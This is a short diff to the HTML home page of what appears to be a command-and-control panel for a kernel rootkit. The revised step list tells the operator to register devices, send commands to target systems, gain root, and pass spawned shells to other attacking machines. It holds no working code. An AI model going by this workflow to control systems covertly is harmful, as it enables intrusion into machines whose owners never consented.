--- a/mobserver/templates/home.html
+++ b/mobserver/templates/home.html
@@ -10,10 +10,10 @@
   <div class="col">
     <h3>Steps:</h3>
     <ul class="text-start">
-      <li>1: Add Devices using the below link.</li>
-      <li>2: Select the added Device and send commands.</li>
-      <li>3: Send Commands and get Interactive shell.</li>
-      <li>4: Get root access by invoking the kernel rootkit.</li>
+      <li>1: Add Devices using the below link. ( If you are using the kernel module then this step will be automatically done by that.)</li>
+      <li>2: Select the added Device and start sending commands to the target system.</li>
+      <li>3: As you will directly get root access. If you don't get root access then use command to gain root privilege.</li>
+      <li>4: You can also spawn a new shell and transfer it to any other attaking system.</li>
     </ul>
   </div>
 
